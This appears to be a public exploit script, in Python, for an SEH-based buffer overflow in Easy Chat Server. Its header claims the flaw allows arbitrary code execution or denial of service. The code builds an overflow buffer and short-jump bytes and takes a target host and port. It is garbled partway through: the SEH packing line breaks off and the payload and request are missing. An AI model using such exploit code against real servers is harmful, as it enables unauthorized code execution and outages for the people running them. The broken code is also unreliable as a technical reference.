# Exploit Author: Juan Sacco # Vulnerability found using Exploit Pack v10 - http://exploitpack.com # # Impact: # An attacker could exploit this vulnerability to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a denial-of-service condition. # # Program description: # Easy Chat Server is a easy, fast and affordable way to host and manage your own real-time communication software, # it allows friends/colleagues to chat with you through a Web Browser (IE, Safari, Chrome, Opera etc.) # Vendor page: http://www.echatserver.com/ import string, sys import socket, httplib import struct def exploit(): try: junk = '\x41' * 217 shortjmp = "\xeb\x08\xcc\xcc" # Jump over SEH seh = struct.pack('" try: host = sys.argv[1] port = sys.argv[2] except IndexError: howtousage() exploit()